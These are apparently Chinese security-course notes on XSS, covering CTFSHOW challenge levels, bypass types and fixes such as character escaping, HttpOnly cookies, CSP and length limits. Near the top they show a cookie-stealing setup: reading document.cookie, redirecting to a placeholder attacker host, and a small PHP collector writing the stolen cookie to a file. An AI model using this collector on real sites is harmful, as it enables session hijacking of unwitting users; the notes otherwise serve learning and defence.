day38 XSS跨站&绕过修复&http_only&CSP&标签符号

XSS绕过-CTFSHOW-361到331关卡绕过WP

前言:

document.cookie//获取当前浏览器cookie信息

windows.location.her="xxxx.com'去访问目标网站

GET.PHP?

$cookie=$_GET['c'];

$myfile = fopen("cookie.txt","w"); //打开一个文件,以写入的方式

fwrite($myfile,$cookie);//将cookie变量的值写入到$myfile

fclose($myfile);//关闭这个文件

?>

XSS绕过-CTFSHOW-361到331关卡绕过WP


绕过:https://xz.aliyun.com/t/4067

反射型


316-反射型-直接远程调用

317-反射型-过滤

328-存储型-注册插入JS

329-存储型-失效凭据需1步完成所需操作//session失效,那么我们只能通过获取当前页面的源代码

330-存储型-借助修改密码重置管理员密码(GET)

//比较隐藏

331-存储型-借助修改密码重置管理员密码(POST)

 

XSS修复-过滤函数&http_only&CSP&长度限制


1、过滤一些危险字符,以及转义& < > " ' 等危险字符
自定义过滤函数引用


2、HTTP-only Cookie(不让js函数读取cookie)
https://www.php.cn/php-ask-457831.html
php.ini设置或代码引用
session.cookie_httponly =1
ini_set("session.cookie_httponly", 1);


3、设置CSP(Content Security Policy)
https://blog.csdn.net/a1766855068/article/details/89370320
header("Content-Security-Policy:img-src 'self' ");


4、输入内容长度限制,实体转义等

你可能感兴趣的:(小迪网安笔记,安全)